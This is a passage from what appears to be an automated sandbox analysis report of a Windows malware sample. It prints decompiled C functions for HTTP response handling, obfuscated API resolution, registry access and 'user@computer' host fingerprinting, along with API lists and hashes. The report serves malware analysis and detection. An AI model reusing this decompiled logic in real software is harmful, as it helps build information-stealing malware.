                                				long _t56;
                                				void* _t58;
                                				void* _t59;
                                				void* _t61;
                                
                                				_t61 = __esi;
                                				_t59 = __ecx;
                                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                				do {
                                					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                					_v20 = _t34;
                                					if(_t34 != 0) {
                                						L3:
                                						_v8 = 4;
                                						_v16 = 0;
                                						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                							_t39 = GetLastError();
                                							_v12 = _t39;
                                							if(_v20 == 0 || _t39 != 0x2ef3) {
                                								L15:
                                								return _v12;
                                							} else {
                                								goto L11;
                                							}
                                						}
                                						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                							goto L11;
                                						} else {
                                							_v16 = 0;
                                							_v8 = 0;
                                							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                							_t58 = E04A41525(_v8 + 1);
                                							if(_t58 == 0) {
                                								_v12 = 8;
                                							} else {
                                								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                									E04A48B22(_t58);
                                									_v12 = GetLastError();
                                								} else {
                                									 *((char*)(_t58 + _v8)) = 0;
                                									 *(_t61 + 0xc) = _t58;
                                								}
                                							}
                                							goto L15;
                                						}
                                					}
                                					SetEvent( *(_t61 + 0x1c));
                                					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                					_v12 = _t56;
                                					if(_t56 != 0) {
                                						goto L15;
                                					}
                                					goto L3;
                                					L11:
                                					_t42 = E04A429C0( *(_t61 + 0x1c), _t59, 0xea60);
                                					_v12 = _t42;
                                				} while (_t42 == 0);
                                				goto L15;
                                			}
                                0x04a457dd
                                0x04a457dd
                                0x04a457ed
                                0x04a457f0
                                0x04a457f4
                                0x04a457fa
                                0x04a457ff
                                0x04a45818
                                0x04a4582c
                                0x04a45833
                                0x04a4583a
                                0x04a4588d
                                0x04a45893
                                0x04a45899
                                0x04a458d4
                                0x04a458da
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a45899
                                0x04a45840
                                0x00000000
                                0x04a45847
                                0x04a45855
                                0x04a45858
                                0x04a4585b
                                0x04a45867
                                0x04a4586b
                                0x04a458cd
                                0x04a4586d
                                0x04a4587f
                                0x04a458bd
                                0x04a458c8
                                0x04a45881
                                0x04a45884
                                0x04a45888
                                0x04a45888
                                0x04a4587f
                                0x00000000
                                0x04a4586b
                                0x04a45840
                                0x04a45804
                                0x04a4580a
                                0x04a4580d
                                0x04a45812
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a458a2
                                0x04a458aa
                                0x04a458af
                                0x04a458b2
                                0x00000000

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04A457F4
                                • SetEvent.KERNEL32(?), ref: 04A45804
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04A45836
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A4585B
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A4587B
                                • GetLastError.KERNEL32 ref: 04A4588D
                                  • Part of subcall function 04A429C0: WaitForMultipleObjects.KERNEL32(00000002,04A4A923,00000000,04A4A923,?,?,?,04A4A923,0000EA60), ref: 04A429DB
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                • GetLastError.KERNEL32(00000000), ref: 04A458C2
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: ccc5fe487e68f0f8cc8b2eabed211ae6050e3de67c826cb8fb3d14f770b56325
                                • Instruction ID: 67f12f899016caca4930a221e6724cd55198002e3977d85793eb574fa6acc7fb
                                • Opcode Fuzzy Hash: ccc5fe487e68f0f8cc8b2eabed211ae6050e3de67c826cb8fb3d14f770b56325
                                • Instruction Fuzzy Hash: 773123B5D00309FFEB20DFA5C88499EB7F8FBC8314F104969E602A6151DB75AA49AF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 63%
                                			E04A47B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _t9;
                                				intOrPtr _t13;
                                				char* _t28;
                                				void* _t33;
                                				void* _t34;
                                				char* _t36;
                                				intOrPtr* _t40;
                                				char* _t41;
                                				char* _t42;
                                				char* _t43;
                                
                                				_t34 = __edx;
                                				_push(__ecx);
                                				_t9 =  *0x4a4d2a8; // 0x40a5a8
                                				_t1 = _t9 + 0x4a4e62c; // 0x253d7325
                                				_t36 = 0;
                                				_t28 = E04A4A055(__ecx, _t1);
                                				if(_t28 != 0) {
                                					_t40 = __imp__;
                                					_t13 =  *_t40(_t28);
                                					_v8 = _t13;
                                					_t41 = E04A41525(_v8 +  *_t40(_a4) + 1);
                                					if(_t41 != 0) {
                                						strcpy(_t41, _t28);
                                						_pop(_t33);
                                						__imp__(_t41, _a4);
                                						_t36 = E04A41188(_t34, _t41, _a8);
                                						E04A48B22(_t41);
                                						_t42 = E04A4976F(StrTrimA(_t36, "="), _t36);
                                						if(_t42 != 0) {
                                							E04A48B22(_t36);
                                							_t36 = _t42;
                                						}
                                						_t43 = E04A4A41C(_t36, _t33);
                                						if(_t43 != 0) {
                                							E04A48B22(_t36);
                                							_t36 = _t43;
                                						}
                                					}
                                					E04A48B22(_t28);
                                				}
                                				return _t36;
                                			}


                                APIs
                                  • Part of subcall function 04A4A055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,04A47BA7,253D7325,00000000,00000000,7691C740,?,?,04A49DA0,?), ref: 04A4A0BC
                                  • Part of subcall function 04A4A055: sprintf.NTDLL ref: 04A4A0DD
                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04A49DA0,?,04E595B0), ref: 04A47BB8
                                • lstrlen.KERNEL32(?,?,?,04A49DA0,?,04E595B0), ref: 04A47BC0
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • strcpy.NTDLL ref: 04A47BD7
                                • lstrcat.KERNEL32(00000000,?), ref: 04A47BE2
                                  • Part of subcall function 04A41188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04A47BF1,00000000,?,?,?,04A49DA0,?,04E595B0), ref: 04A4119F
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04A49DA0,?,04E595B0), ref: 04A47BFF
                                  • Part of subcall function 04A4976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04A47C0B,00000000,?,?,04A49DA0,?,04E595B0), ref: 04A49779
                                  • Part of subcall function 04A4976F: _snprintf.NTDLL ref: 04A497D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 391a21a89a9d2d40a65c225028c730b7da13c464086d4e2f139f0224edd11907
                                • Instruction ID: 1584da194bb64263b7e51c2041ed7dd5856c10f33fd875be2015af32cdd85d8f
                                • Opcode Fuzzy Hash: 391a21a89a9d2d40a65c225028c730b7da13c464086d4e2f139f0224edd11907
                                • Instruction Fuzzy Hash: 2911C67B9011257B67227BB4AE48CAF76ADDFD86683050515F504EB100DF39ED0247A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 04A494A4
                                • SysAllocString.OLEAUT32(0070006F), ref: 04A494B8
                                • SysAllocString.OLEAUT32(00000000), ref: 04A494CA
                                • SysFreeString.OLEAUT32(00000000), ref: 04A49532
                                • SysFreeString.OLEAUT32(00000000), ref: 04A49541
                                • SysFreeString.OLEAUT32(00000000), ref: 04A4954C
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 7f9832f21c14ec078a4065e8904b86dfef179e63f3f5ef82119965bf81df9477
                                • Instruction ID: 9dd6a65e1ca7d62516a84c1ea3d2332960eae64512db291eaf90071225ed1346
                                • Opcode Fuzzy Hash: 7f9832f21c14ec078a4065e8904b86dfef179e63f3f5ef82119965bf81df9477
                                • Instruction Fuzzy Hash: 11415175900609AFDB01DFBCD84469FBBB9EFC9310F144465E914EB210DA71ED16CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A44944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                				intOrPtr _v8;
                                				intOrPtr _t23;
                                				intOrPtr _t26;
                                				_Unknown_base(*)()* _t28;
                                				intOrPtr _t30;
                                				_Unknown_base(*)()* _t32;
                                				intOrPtr _t33;
                                				_Unknown_base(*)()* _t35;
                                				intOrPtr _t36;
                                				_Unknown_base(*)()* _t38;
                                				intOrPtr _t39;
                                				_Unknown_base(*)()* _t41;
                                				intOrPtr _t44;
                                				struct HINSTANCE__* _t48;
                                				intOrPtr _t54;
                                
                                				_t54 = E04A41525(0x20);
                                				if(_t54 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t23 =  *0x4a4d2a8; // 0x40a5a8
                                					_t1 = _t23 + 0x4a4e11a; // 0x4c44544e
                                					_t48 = GetModuleHandleA(_t1);
                                					_t26 =  *0x4a4d2a8; // 0x40a5a8
                                					_t2 = _t26 + 0x4a4e769; // 0x7243775a
                                					_v8 = 0x7f;
                                					_t28 = GetProcAddress(_t48, _t2);
                                					 *(_t54 + 0xc) = _t28;
                                					if(_t28 == 0) {
                                						L8:
                                						E04A48B22(_t54);
                                					} else {
                                						_t30 =  *0x4a4d2a8; // 0x40a5a8
                                						_t5 = _t30 + 0x4a4e756; // 0x614d775a
                                						_t32 = GetProcAddress(_t48, _t5);
                                						 *(_t54 + 0x10) = _t32;
                                						if(_t32 == 0) {
                                							goto L8;
                                						} else {
                                							_t33 =  *0x4a4d2a8; // 0x40a5a8
                                							_t7 = _t33 + 0x4a4e40b; // 0x6e55775a
                                							_t35 = GetProcAddress(_t48, _t7);
                                							 *(_t54 + 0x14) = _t35;
                                							if(_t35 == 0) {
                                								goto L8;
                                							} else {
                                								_t36 =  *0x4a4d2a8; // 0x40a5a8
                                								_t9 = _t36 + 0x4a4e4d2; // 0x4e6c7452
                                								_t38 = GetProcAddress(_t48, _t9);
                                								 *(_t54 + 0x18) = _t38;
                                								if(_t38 == 0) {
                                									goto L8;
                                								} else {
                                									_t39 =  *0x4a4d2a8; // 0x40a5a8
                                									_t11 = _t39 + 0x4a4e779; // 0x6c43775a
                                									_t41 = GetProcAddress(_t48, _t11);
                                									 *(_t54 + 0x1c) = _t41;
                                									if(_t41 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                										_t44 = E04A45CD1(_t54, _a8);
                                										_v8 = _t44;
                                										if(_t44 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a12 = _t54;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}


                                APIs
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04A434A1,?,00000001,?,?,00000000,00000000), ref: 04A44969
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04A4498B
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04A449A1
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04A449B7
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04A449CD
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04A449E3
                                  • Part of subcall function 04A45CD1: memset.NTDLL ref: 04A45D50
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: b754cc5ec1b89e954d9abf9f21d3ea3b72f48a857f51377698bca2253faf563b
                                • Instruction ID: d5e4ef0eac354432179553d5317e0189ea99dfc19dc255e79ac721fa39be0f7b
                                • Opcode Fuzzy Hash: b754cc5ec1b89e954d9abf9f21d3ea3b72f48a857f51377698bca2253faf563b
                                • Instruction Fuzzy Hash: 722157B560060AAFE710EF69DC88E5FB7ECEFD83047014426E905DB661E774ED058B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E04A44B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                				signed int _v8;
                                				char _v12;
                                				signed int* _v16;
                                				char _v284;
                                				void* __esi;
                                				char* _t59;
                                				intOrPtr* _t60;
                                				intOrPtr _t64;
                                				char _t65;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t71;
                                				void* _t73;
                                				signed int _t81;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				signed int* _t100;
                                				intOrPtr* _t101;
                                				void* _t102;
                                
                                				_t92 = __ecx;
                                				_v8 = _v8 & 0x00000000;
                                				_t98 = _a16;
                                				if(_t98 == 0) {
                                					__imp__( &_v284,  *0x4a4d33c);
                                					_t91 = 0x80000002;
                                					L6:
                                					_t59 = E04A47B3B( &_v284,  &_v284);
                                					_a8 = _t59;
                                					if(_t59 == 0) {
                                						_v8 = 8;
                                						L29:
                                						_t60 = _a20;
                                						if(_t60 != 0) {
                                							 *_t60 =  *_t60 + 1;
                                						}
                                						return _v8;
                                					}
                                					_t101 = _a24;
                                					if(E04A48C52(_t92, _t97, _t101, _t91, _t59) != 0) {
                                						L27:
                                						E04A48B22(_a8);
                                						goto L29;
                                					}
                                					_t64 =  *0x4a4d278; // 0x4e59d18
                                					_t16 = _t64 + 0xc; // 0x4e59e3a
                                					_t65 = E04A47B3B(_t64,  *_t16);
                                					_a24 = _t65;
                                					if(_t65 == 0) {
                                						L14:
                                						_t29 = _t101 + 0x14; // 0x102
                                						_t33 = _t101 + 0x10; // 0x3d04a4c0
                                						if(E04A4A38F(_t97,  *_t33, _t91, _a8,  *0x4a4d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                							_t68 =  *0x4a4d2a8; // 0x40a5a8
                                							if(_t98 == 0) {
                                								_t35 = _t68 + 0x4a4ea3f; // 0x4d4c4b48
                                								_t69 = _t35;
                                							} else {
                                								_t34 = _t68 + 0x4a4e8e7; // 0x55434b48
                                								_t69 = _t34;
                                							}
                                							if(E04A48F85(_t69,  *0x4a4d334,  *0x4a4d338,  &_a24,  &_a16) == 0) {
                                								if(_t98 == 0) {
                                									_t71 =  *0x4a4d2a8; // 0x40a5a8
                                									_t44 = _t71 + 0x4a4e846; // 0x74666f53
                                									_t73 = E04A47B3B(_t44, _t44);
                                									_t99 = _t73;
                                									if(_t73 == 0) {
                                										_v8 = 8;
                                									} else {
                                										_t47 = _t101 + 0x10; // 0x3d04a4c0
                                										E04A44538( *_t47, _t91, _a8,  *0x4a4d338, _a24);
                                										_t49 = _t101 + 0x10; // 0x3d04a4c0
                                										E04A44538( *_t49, _t91, _t99,  *0x4a4d330, _a16);
                                										E04A48B22(_t99);
                                									}
                                								} else {
                                									_t40 = _t101 + 0x10; // 0x3d04a4c0
                                									E04A44538( *_t40, _t91, _a8,  *0x4a4d338, _a24);
                                									_t43 = _t101 + 0x10; // 0x3d04a4c0
                                									E04A44538( *_t43, _t91, _a8,  *0x4a4d330, _a16);
                                								}
                                								if( *_t101 != 0) {
                                									E04A48B22(_a24);
                                								} else {
                                									 *_t101 = _a16;
                                								}
                                							}
                                						}
                                						goto L27;
                                					}
                                					_t21 = _t101 + 0x10; // 0x3d04a4c0
                                					_t81 = E04A47DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                					if(_t81 == 0) {
                                						_t100 = _v16;
                                						if(_v12 == 0x28) {
                                							 *_t100 =  *_t100 & _t81;
                                							_t26 = _t101 + 0x10; // 0x3d04a4c0
                                							E04A4A38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                						}
                                						E04A48B22(_t100);
                                						_t98 = _a16;
                                					}
                                					E04A48B22(_a24);
                                					goto L14;
                                				}
                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                					goto L29;
                                				} else {
                                					_t97 = _a8;
                                					E04A4A789(_t98, _a8,  &_v284);
                                					__imp__(_t102 + _t98 - 0x117,  *0x4a4d33c);
                                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                					_t91 = 0x80000003;
                                					goto L6;
                                				}
                                			}



                                APIs
                                • StrChrA.SHLWAPI(04A49900,0000005F,00000000,00000000,00000104), ref: 04A44B5D
                                • lstrcpy.KERNEL32(?,?), ref: 04A44B8A
                                  • Part of subcall function 04A47B3B: lstrlen.KERNEL32(?,00000000,04E59D18,00000000,04A45142,04E59F3B,?,?,?,?,?,69B25F44,00000005,04A4D00C), ref: 04A47B42
                                  • Part of subcall function 04A47B3B: mbstowcs.NTDLL ref: 04A47B6B
                                  • Part of subcall function 04A47B3B: memset.NTDLL ref: 04A47B7D
                                  • Part of subcall function 04A44538: lstrlenW.KERNEL32(?,?,?,04A44CF3,3D04A4C0,80000002,04A49900,04A45C8D,74666F53,4D4C4B48,04A45C8D,?,3D04A4C0,80000002,04A49900,?), ref: 04A4455D
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                • lstrcpy.KERNEL32(?,00000000), ref: 04A44BAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 5a032c88ffa9ae69a11cd05c760f16c6e3b31d6623f064b555c862d4ebb0dce0
                                • Instruction ID: 23ef1b6fe48c16521cf43a1d5eb16383c7fb56dbd50a3b1f964b94ad1ea6ce3a
                                • Opcode Fuzzy Hash: 5a032c88ffa9ae69a11cd05c760f16c6e3b31d6623f064b555c862d4ebb0dce0
                                • Instruction Fuzzy Hash: F2512A79100209BFEF11AFA0ED40EAE77B9FBD8315F008558F91596160D73AF9669B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E04A49FF6() {
                                				void* _v0;
                                				void** _t1;
                                				void** _t3;
                                				void** _t5;
                                				void** _t7;
                                				void** _t8;
                                				void* _t10;
                                
                                				/* Swaps the buffer stored at offset 0 of the global context block (0x4a4d32c)
                                				   under the CRITICAL_SECTION kept at index 0x10 of that block. The APIs list
                                				   below resolves the two import calls to RtlEnterCriticalSection and
                                				   RtlLeaveCriticalSection. */
                                				_t3 =  *0x4a4d32c; // 0x4e595b0
                                				RtlEnterCriticalSection( &(_t3[0x10]));
                                				/* Polls the field at index 0x16 with 10 ms sleeps until it reads zero. */
                                				while(1) {
                                					_t5 =  *0x4a4d32c; // 0x4e595b0
                                					_t1 =  &(_t5[0x16]); // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				/* Free the previous buffer unless it is the static default at 0x4a4e81a,
                                				   then install the caller-supplied one (_v0). */
                                				_t7 =  *0x4a4d32c; // 0x4e595b0
                                				_t10 =  *_t7;
                                				if(_t10 != 0 && _t10 != 0x4a4e81a) {
                                					HeapFree( *0x4a4d238, 0, _t10);
                                					_t7 =  *0x4a4d32c; // 0x4e595b0
                                				}
                                				 *_t7 = _v0;
                                				_t8 =  &(_t7[0x10]);
                                				RtlLeaveCriticalSection(_t8);
                                				return _t8;
                                			}

                                Instruction address range: 0x04a49ff6 - 0x04a4a052

                                APIs
                                • RtlEnterCriticalSection.NTDLL(04E59570), ref: 04A49FFF
                                • Sleep.KERNEL32(0000000A,?,04A430F3), ref: 04A4A009
                                • HeapFree.KERNEL32(00000000,?,?,04A430F3), ref: 04A4A037
                                • RtlLeaveCriticalSection.NTDLL(04E59570), ref: 04A4A04C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: e9174fae930497f59982df252a9b05a226d64cc66c3beb73351737a46006c3e2
                                • Instruction ID: 5bf82388a9fab8bc871d876dfa93362cb15b7870a1ef10ee8cb5f85910565fdd
                                • Opcode Fuzzy Hash: e9174fae930497f59982df252a9b05a226d64cc66c3beb73351737a46006c3e2
                                • Instruction Fuzzy Hash: 0FF0D47C7411009BF7188F64E849E2D77E4EBE8750B058008E906DB650D73EFC02DA20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A49267() {
                                				long _v8;
                                				long _v12;
                                				int _v16;
                                				long _t39;
                                				long _t43;
                                				signed int _t47;
                                				short _t51;
                                				signed int _t52;
                                				int _t56;
                                				int _t57;
                                				int _t31;
                                				char* _t64;
                                				short* _t67;
                                
                                				/* Builds "<user>@<computer>" as a NUL-terminated UTF-8 string on the heap.
                                				   E04A41525 is the sample's heap allocator (RtlAllocateHeap, see the APIs list
                                				   below) and E04A48B22 its free routine. Returns the buffer, or 0 on failure. */
                                				_v16 = 0;
                                				_v8 = 0;
                                				GetUserNameW(0,  &_v8);        /* NULL buffer: _v8 receives the required length */
                                				_t39 = _v8;
                                				if(_t39 != 0) {
                                					_v12 = _t39;
                                					_v8 = 0;
                                					GetComputerNameW(0,  &_v8);    /* same size probe for the computer name */
                                					_t43 = _v8;
                                					if(_t43 != 0) {
                                						_v12 = _v12 + _t43 + 2;
                                						/* one allocation holds both the UTF-16 scratch copy and the UTF-8 result */
                                						_t64 = E04A41525(_v12 + _t43 + 2 << 2);
                                						if(_t64 != 0) {
                                							_t47 = _v12;
                                							_t67 = _t64 + _t47 * 2;    /* UTF-16 work area in the upper part of the buffer */
                                							_v8 = _t47;
                                							if(GetUserNameW(_t67,  &_v8) == 0) {
                                								L7:
                                								E04A48B22(_t64);
                                							} else {
                                								_t51 = 0x40;               /* '@' overwrites the user name's terminating NUL */
                                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                								_t52 = _v8;
                                								_v12 = _v12 - _t52;
                                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                									goto L7;
                                								} else {
                                									_t56 = _v12 + _v8;
                                									_t31 = _t56 + 2; // 0x4a49cb2
                                									_v12 = _t56;
                                									/* 0xfde9 == 65001 == CP_UTF8: the joined name is stored as UTF-8 */
                                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                									_v8 = _t57;
                                									if(_t57 == 0) {
                                										goto L7;
                                									} else {
                                										_t64[_t57] = 0;
                                										_v16 = _t64;
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v16;
                                			}

                                Instruction address range: 0x04a49275 - 0x04a49339

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,04A49CB0), ref: 04A4927B
                                • GetComputerNameW.KERNEL32(00000000,04A49CB0), ref: 04A49297
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • GetUserNameW.ADVAPI32(00000000,04A49CB0), ref: 04A492D1
                                • GetComputerNameW.KERNEL32(04A49CB0,?), ref: 04A492F4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04A49CB0,00000000,04A49CB2,00000000,00000000,?,?,04A49CB0), ref: 04A49317
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 43501d7265e021c33073a8585374a6fdddea8aafed176017eba26a8d17b7171b
                                • Instruction ID: e4d774e6575d4f136d5723e56e0aeadda9ba099362b830afd1f8510c7729316e
                                • Opcode Fuzzy Hash: 43501d7265e021c33073a8585374a6fdddea8aafed176017eba26a8d17b7171b
                                • Instruction Fuzzy Hash: F221C5B6900208EFDB11DFE8D9889EFBBBCEBD5304B5044AAE502E7240D634AB55DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04A49EBB(intOrPtr _a4) {
                                				void* _t2;
                                				unsigned int _t4;
                                				void* _t5;
                                				long _t6;
                                				void* _t7;
                                				void* _t15;
                                
                                				/* Process-wide initialisation: a manual-reset event, the OS version word, the
                                				   current PID, the caller's argument and a handle to the sample's own process
                                				   are stored in globals at 0x4a4d254..0x4a4d26c. */
                                				_t2 = CreateEventA(0, 1, 0, 0);    /* bManualReset = 1, initially non-signalled */
                                				 *0x4a4d26c = _t2;
                                				if(_t2 == 0) {
                                					return GetLastError();
                                				}
                                				/* GetVersion packs the major version in the low byte and the minor version in
                                				   bits 8..15. The decompiler has mangled the comparison below (_t15 is never
                                				   assigned on the _t4 != 5 path and _t4 - _t4 is always 0); only the constants
                                				   are reliable: 5 is the major version of Windows 2000/XP/2003 and
                                				   0x32 is ERROR_NOT_SUPPORTED. */
                                				_t4 = GetVersion();
                                				if(_t4 != 5) {
                                					L4:
                                					if(_t15 <= 0) {
                                						_t5 = 0x32;
                                						return _t5;
                                					}
                                					L5:
                                					 *0x4a4d25c = _t4;
